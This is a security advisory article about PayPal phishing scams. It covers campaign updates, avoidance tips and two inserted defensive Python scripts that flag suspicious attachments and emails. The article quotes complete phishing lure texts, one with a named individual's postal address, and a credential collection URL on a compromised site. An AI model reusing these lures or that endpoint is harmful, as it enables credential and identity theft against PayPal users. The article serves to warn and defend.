PayPal Phishing Scams – How to Avoid Them

Read the article to see how you can avoid PayPal Phishing Scams and remove malware distributed by such scams. E-mails, messages and websites are all involved in these types of spoofing. The article will also help you tell PayPal Phishing Scams and official PayPal messages apart. If you notice that your computer system is infected or behaves strangely, we recommend that you scan it with a security tool.

PayPal Phishing Scams are common worldwide. Many variations of these scams exist, featuring websites specifically designed to generate spoofed pages, messages deliberately trying to trick you into believing you have a problem, or notifications which may lead to stolen credentials or your PC getting infected with malware. All of these types of PayPal scams are still in circulation, and through them a lot of sensitive data or money is being stolen. People keep falling victim to such spoofed messages, regardless of the form in which they are sent. PayPal has been used in many scams over the years, and with each new one cybercriminals get better at making a scam look as close as possible to the original messaging used by the big brand. If you are targeted with a spoofed message, you will be asked to log in to “PayPal” or visit a Web domain and perform an action there, like paying for a failed shipment.

Threat Summary

Name: PayPal Phishing Scams
Type: Phishing, PUP, malware
Short Description: Phishing messages trying to trick you into clicking links. Once clicked, a link will redirect you to a landing page. You will be asked to perform an action there, such as providing credentials or personal information, or filling in a form. Occasionally, clicking a link will download malware onto your computer.
Symptoms: You receive an e-mail message that is allegedly from PayPal. You will be urged to click on a link. You can then get malware on your computer or land on a page that imitates the official PayPal website and demands that you fill in personal details.
Distribution Method: Phishing Emails, Pop-up messages, Redirects

PayPal Phishing Scams – Update December 2018

In December 2018 we received reports of a new scheme that uses a domain posing as a PayPal notification service. Upon interaction with a malicious site or a phishing email, victims might be redirected to it. It will spawn a pop-up notification or a new tab page that will ask for the users’ login credentials.

We remind our readers that the sources of infection can be different and include the following typical cases:

  • Email Scam Messages — The hacker operators may send out phishing emails impersonating PayPal. The messages can use the same design layout as the company itself. The only difference would be the link to the login page.
  • Redirects — Links presented through browser hijackers and social networks via hacked or hacker-owned accounts.
  • Virus Infections — Various malware infections can lead to the display of the PayPal phishing scam.

PayPal Phishing Scams – Update November 2018

A new type of phishing email message has been detected with the subject line “Action required: Confirm your info by XX/XX/XX to keep a PayPal balance”, where the “X” characters are filled in with a date. The message states that recipients need to confirm their identity in order to continue using the service. The email follows the usual design template used by the service and it can even be personalized with the recipient’s name. This is done by cross-linking the victim’s email address with publicly accessible information. If recipients click on the links, they will be redirected to the phishing landing page where their account credentials will be requested. If entered, the credentials will automatically be forwarded to the hacker operators.

PayPal Phishing Scams – Update October 2018

In October 2018 another phishing scam strategy was observed. This time computer criminals used SMS messages to confuse users into thinking that PayPal is contacting them about their account. The received message is written in the fashion of a security notification. The message reads the following:

Your PayPal has been temporarily locked. You have 36H to confirm the account information or your account will be closed: XXXXXXXXXXXXx

A link to a fake login page will be sent as a URL. If the users click on it, they will be taken to a screen asking for their account credentials. If entered, the username and password combination will automatically be sent to the operators of the scam.

An additional PayPal phishing scheme redirects the users to a simplified login screen that uses the familiar quick sign-in prompt. The criminals have made an exact copy of how the login screens appear, the labels and layout of buttons as well as the slide animation between the username and password entry screens.

PayPal Phishing Scams – Update August 2018

New PayPal Phishing scams were detected within the first few days of August 2018, and they continue to be delivered as spam email messages. They can contain malicious files attached to the email and/or links that aim to redirect you to a phishing page.

Below you can see the two most common messages, used either as the Subject of a message or in its actual contents:

  • _Protect your account_
  • _Now check the account information that belongs to you!_

Notice how both of them are wrapped in underscores ( “_” ) and mention something about checking whether your account is in order. Do not trust such messages and delete them from your e-mail inbox.

PayPal Phishing Scams – Distribution Methods

PayPal Phishing Scams might be distributed via a third-party installation setup. Applications connected to PayPal Phishing Scams can get onto your computer without your knowledge. Installer setups like those could be set by default to install additional components. Bundled packages and freeware setups regarded as PUPs could be distributed and push scam messages to your PC and browsers. To avoid installing unwanted applications, look for the Custom or Advanced settings. If you find such settings, you can probably deselect anything you do not want on your machine.

Note! These types of PayPal Phishing Scams were seen to be pushed via e-mail messages on a large scale, as showcased in the screenshot below. Beware of any messages that have links to PayPal services that you do not remember using.

PayPal Phishing Scams might also be distributed through similar-looking websites which host phishing landing pages. Websites like those use the PayPal logo without permission, to the extent that you might not be able to tell the original from the bogus website. Clicking on just one redirect link or an advertisement could send a virus to your computer. In addition, banners, pop-ups and other kinds of adverts could be placed on top of browser pages to push more links and phishing messages. All browsers could be affected, and any operating system for that matter.

PayPal Phishing Scams – Detailed Analysis

Many scams related to PayPal are circulating on the World Wide Web nowadays and seem to increase every month. This article shows the most common types of scams related to the PayPal service and how you can recognize them. Scams tied to PayPal are not very innovative, as you can see older versions of them over the years. Unfortunately, every year each scam gets a little more sophisticated than its past variant and keeps spreading to more users, who are potential victims if they do not know about it. Surprisingly, the number of people who are tricked keeps increasing rather than decreasing.

Websites which are hosting PayPal Phishing Scams can load pop-ups and other advertising content as you are browsing to help popularize a type of scam page. Heaps of advertisements might show, promoting a way to obtain money via PayPal.

PayPal’s “You’ve Received New Funds” Scam

This scam is a recurring one, which means that it keeps showing up, year after year, month after month. The scam shows you a notification which states “You’ve Received New Funds”.

You can preview a variant of the You’ve Received New Funds scam message below:

From the above image, you can see an e-mail message stating that you have received new funds in your PayPal account. However, PayPal uses other wording when it comes to that – either “You’ve got money” or that “Somebody sent you X” amount of money. Below you can see what such a message contains:

You’ve Received New Funds!
This email confirms that you have received a payment for 706.70 GBP from [email protected]
Receipt ID: 9880-7964-4082-4830
The number above is the buyer’s receipt ID for this transaction. Please retain it for your records so that you will be able to reference this transaction for customer service.
View the details of this transaction
PayPal Shopping Cart Contents
Item Name: Post Man Pat, PC Selby Car & Figure
Item Number: 400301809020

Quantity: 1

Total: 706.70 GBP
Cart Subtotal: 706.70 GBP
Postage: 14.25 GBP
VAT:
Cart Total: 706.70 GBP

Payment details
Total amount: 706.70 GBP
Currency: British Pounds
Transaction ID: 7HD151924J961211N
Postage and packaging: 14.25 GBP
Postal insurance: 0.00 GBP
Buyer: Kathryn Watts
Buyer’s User ID: kate3282

Postage Information

Address Kathryn Watts
2 Haselmere Close
Bury St Edmunds, Suffolk
IP32 7JQ
United Kingdom

Address status Confirmed

Have you lifted your withdrawal and receiving limits? Just log in to your PayPal account and click View Limits on the Account Overview page.

Yours sincerely,
PayPal
Copyright S 1999-2012 PayPal. All rights reserved.

PayPal (Europe) S.a r.l. et Cie, S.C.A.
Societe en Commandite par Actions
Registered Office: 5th Floor 22-24 Boulevard Royal L-2449, Luxembourg
RCS Luxembourg B 118 349

PayPal Email ID PP345

The above text will either appear on a landing page, be embedded with images in the email’s body, or be sent as an attachment. In the last case the email carries a file (usually an executable or JavaScript file disguised as a document). The document is most commonly presented as a PDF. Such an attachment will also, in most cases, download a malicious payload aiming to infect your computer system. Once it is inside, your computer will be compromised and might be used for various nefarious purposes. Those purposes include your computer being used as part of a botnet or as a gateway to steal your credentials, personal information or other details related to your PayPal account.

The screenshot shown above depicts how PayPal is being spoofed through its logos, its brand and the way its messages are sent. You might be provided with a link that sends you to a page where you will be asked to give your password and account name (which in most cases is the email you have registered your PayPal account with), which seems suspicious in itself.

“Review your PayPal account limited statement” Phishing Scams

The PayPal Phishing Scams have many variations, but what you will see most commonly is the following message, displayed in the below screenshot:

Such an email message will state something in the lines of the following:

Review your PayPal account limited statement

—————————————————————-

Dear PayPal Customer,

We understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.

As part of our security measures, we regularly check the PayPal screen activity. We request information from you for the following reason:

Our system detected unusual charges to a credit card linked to your PayPal account.

Download the attached form to verify your Profile information and restore your account access. And make sure you enter the information accurately, and according to the formats required. Fill in all the required fields.

Thanks for joining the millions of people who rely on us to make secure financial transactions around the world.

Regards,

PayPal

You will be asked to download an attachment with a message inside. The message will instruct you to open a link. That link may look like the official URL address of the PayPal service, but do not be fooled. The link will redirect you to a phishing page that may look very similar to a legitimate PayPal-hosted page, but has a suspicious URL that is not located on the official PayPal domain. In this case, the link “https://www.paypal.com/il/cgi-bin/webscr?SESSION=F5sJMNm-og4yRrDzVrFsSwS4Pjt6Wq1x-aFmISUJZy7xVTNjFu8OmrGhb-4&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33” will land you on the “https://www.paypal.com/” page, but launch a script. The script makes sure that any detail and information that you type in will actually be sent to the “http://www.egypt-trips.co/wp-admin/includes/New/post_data.php” address. The image below shows how the page looks:

Afterward, you will be prompted to enter your details, such as an email address, password, first and last name, date of birth, nationality, city, address, zip code, mobile number and other personal data. In case you are wondering why, it is because the cybercriminals want to steal your PayPal account along with your identity. If you proceed and enter all of these details, you will be redirected to a page that requires further details, like your credit card number, with a “Finish” button at the end. This is the second page, which displays the second part of the details that are asked from you:

If you didn’t get suspicious by now, then either you are a new PayPal user and do not know how their system works (like, if you enter such information once through their site it will be filled in those forms the next time you are on such a page) or you believed in what the scam is claiming. In case you entered every detail on that page, you will finally get redirected to the official page of the PayPal website. You should be wary of any such websites and if you doubt the contents of a message that is supposedly from PayPal you should ask your family household if anybody used the service or tampered with a joint account.
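The check a mail gateway or analyst can run on such an HTML attachment before anyone opens it, as an added example that is not part of the original article: it lists forms that submit outside paypal.com and links whose visible text names paypal.com while the href goes elsewhere. The class and function names are hypothetical and the sample attachment with its .example hosts is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_DOMAIN = "paypal.com"

def on_trusted_domain(url):
    """True only for http(s) URLs whose host is paypal.com or a subdomain."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:          # malformed URL: treat as untrusted
        return False
    return parts.scheme in ("http", "https") and (
        host == TRUSTED_DOMAIN or host.endswith("." + TRUSTED_DOMAIN))

class AttachmentAudit(HTMLParser):
    """Records forms that submit off-domain and links whose visible text
    names paypal.com while the href goes elsewhere."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._href = None       # href of the <a> currently open, if any
        self._label = []        # text seen inside that <a>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # An empty or relative action is flagged too: a local attachment
            # has no PayPal origin for it to resolve against.
            action = attrs.get("action") or ""
            if not on_trusted_domain(action):
                self.findings.append(("form-posts-off-domain", action))
        elif tag == "a":
            self._href, self._label = attrs.get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._label.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            label = "".join(self._label).lower()
            if TRUSTED_DOMAIN in label and not on_trusted_domain(self._href):
                self.findings.append(("link-text-mismatch", self._href))
            self._href = None

def audit(html):
    parser = AttachmentAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample attachment; the .example hosts are placeholders.
SAMPLE_ATTACHMENT = """
<p>Restore access at
<a href="http://paypal.com.account-check.example/login">https://www.paypal.com/</a></p>
<p><a href="https://www.paypal.com/signin">PayPal.com sign-in</a></p>
<form method="post" action="http://collector.example/post_data.php">
  <input name="email"><input name="password" type="password">
</form>
"""

if __name__ == "__main__":
    for kind, target in audit(SAMPLE_ATTACHMENT):
        print(kind, target)
```

An empty result does not clear a file: as the case above shows, a script can redirect what is typed at submit time, which a static look at the form action cannot see.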

All of the scams described above, plus others which are similar to them, might be advertised or promoted in some shape or form. Do not believe messages that look suspicious, especially when you do not recollect doing any of the actions described inside them. Beware of such scams, as they try to look as close as possible to messages sent by PayPal. To do that, criminals use exactly or nearly the same design, fonts, logos and wording as the PayPal site network.

Below you will see how to differentiate the usage of the PayPal brand from scams and the real thing. You will also find good tips on what to do or not do, so you can avoid getting scammed. At the end of the day, you should also scan your computer in case a malware is causing such messages to show up on your computer screen.

“Confirm your information and link your card” Phishing Scams

A recent email-based phishing scam targeting PayPal users was detected during its attack campaign. The victims receive a warning notification asking them to re-link their payment card in the service. The quoted reason is to “avoid account suspension”. The email message contains graphics, layout and text that are typical of the service. At the same time, recipients are given a link that leads them to a website that is not part of the legitimate PayPal domain.

The phishing scam landing page may be designed to look just like the real login screen. It will request the account credentials used by PayPal and any additional information. All collected information can be used for additional crimes such as identity theft and financial theft.

PayPal Phishing Scams – How to Avoid Them?

In this section, you will find out how to differentiate between PayPal Phishing Scams and messages from the official PayPal brand, following a simple set of rules and guidelines. So, if you are reading this article, you should now know that there is a multitude of scams involving PayPal featuring spoofed messages. Below you will find more on the topic.

Refer to the official PayPal page for Common Email Scams.

Now that you know about the existence of the scams and of the Common Email Scams page hosted on the PayPal website, refer to the following guidelines on how to avoid most scams related to the service:

  • Do not provide any details about you, your addresses or similar information via email or unknown Web pages
  • Do not open email attachments, as PayPal does not send such, nor does it request clients to open any
  • Always use PayPal.com to refer to pages in connection with the service
  • Avoid messages with grammatical or typographical errors
  • Avoid emails that are not addressed to you by name
  • Avoid messages sent by a service you don’t expect to hear from
  • Avoid clicking on links to provide your email address for verification
  • Avoid payments to someone whose identity you can’t confirm or if he wants to use a middleman service
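Several of these guidelines can be checked mechanically before a message reaches a reader. The triage below is an added example, not part of the original article: it applies three of them (no attachments, addressed by name, wording used by the campaigns described in this article) to a raw message. The function names, reason labels, addresses and sample messages are all constructed.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Subject wording taken from the campaigns described in this article.
SCAM_SUBJECTS = [
    ("underscore-wrapped-subject", re.compile(r"^_.+_$")),          # August 2018
    ("confirm-info-deadline",                                       # November 2018
     re.compile(r"confirm your info by \S+ to keep a paypal balance", re.I)),
    ("received-new-funds", re.compile(r"you.ve received new funds", re.I)),
]

def triage(raw_bytes, recipient_name):
    """Return the list of reasons a message deserves suspicion."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    reasons = []
    subject = str(msg["Subject"] or "").strip()
    reasons += [name for name, rx in SCAM_SUBJECTS if rx.search(subject)]
    # Guideline: PayPal does not send attachments.
    files = [part.get_filename() or "(unnamed)" for part in msg.iter_attachments()]
    if files:
        reasons.append("attachment:" + ",".join(files))
    # Guideline: avoid emails that are not addressed to you by name.
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    if recipient_name.lower() not in text.lower():
        reasons.append("not-addressed-by-name")
    return reasons

def build_sample(subject, body, attachment=None):
    """Build a constructed test message and return it as raw bytes."""
    m = EmailMessage()
    m["From"] = "PayPal <service@notice.example>"   # constructed address
    m["To"] = "alex.doe@example.org"                # constructed address
    m["Subject"] = subject
    m.set_content(body)
    if attachment:
        m.add_attachment(b"constructed placeholder bytes",
                         maintype="application", subtype="octet-stream",
                         filename=attachment)
    return m.as_bytes()

if __name__ == "__main__":
    scam = build_sample(
        "_Protect your account_",
        "Dear PayPal Customer,\nDownload the attached form to verify "
        "your Profile information.\n",
        attachment="form.html")
    print(triage(scam, "Alex Doe"))
```

A message that does contain the recipient's name is not cleared by that alone, since the November 2018 campaign described above personalized its emails.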

Note! In case you remain unsure of what to do or you do not know if a message you got is actually from PayPal you can ask the US PayPal Community directly from this link to receive some feedback. Most of the scams in circulation are well-known and somebody should be able to assist you there. If you want to report a scam/spoofed message related to PayPal – refer to the official PayPal report page.

The guidelines listed above were put together by the SensorsTechForum team after research on the matter. These rules are based on common sense and on the various scams related to PayPal.

A part of those scams related to PayPal can be removed by closing the message or browser. In case the scam pages continue to bother you even after that, then you probably have something else on your computer that is generating them.

Remove PayPal Phishing Scams and Related Malware

All that is required to remove some PayPal Phishing Scams is to ignore the message, never respond to it and delete it. Other scams require a bit of action, such as thoroughly scanning your computer machine with security software to determine whether you have some malware component that is pushing PayPal spoofed messages to your computer, browser or e-mail address.

We highly recommend that all computer users scan their system for active infections and malware using a security program. That could prevent many malicious actions and stop malware from spreading further.


Berta Bilbao

Berta is a dedicated malware researcher, dreaming for a more secure cyber space. Her fascination with IT security began a few years ago when a malware locked her out of her own computer.
